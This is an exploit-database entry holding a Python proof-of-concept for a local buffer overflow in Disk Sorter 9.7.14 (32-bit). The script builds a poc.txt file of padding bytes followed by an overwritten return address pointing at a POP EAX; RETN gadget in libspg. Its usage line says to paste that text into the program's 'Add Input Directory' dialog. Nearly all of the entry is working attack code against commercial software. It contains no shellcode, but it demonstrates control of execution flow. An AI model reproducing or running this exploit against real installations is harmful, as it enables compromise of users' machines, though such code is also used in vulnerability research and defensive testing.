Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow
来源:vfocus.net 作者:n3ckD_ 发布时间:2017-06-06
#!/usr/bin/python ###################################### # Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC # Date: 25 May 2017 # Exploit Author: n3ckD_ # Vendor Homepage: http://www.disksorter.com/ # Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe # Version: Disk Sorter v9.7.14 (32-Bit) # Tested on: Windows 7 Enterprise SP1 (Build 7601) # Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog ###################################### print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC" print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog" # in libspg:.text # 10147C1C 58 POP EAX # 10147C1D C3 RETN ret = "\x1c\x7c\x14\x10" nops = "\x47\x4F"*24 buf = nops + "A"*4048 + ret + "MAGIC" + "\n" f = open("poc.txt","w") f.write(buf) f.close()
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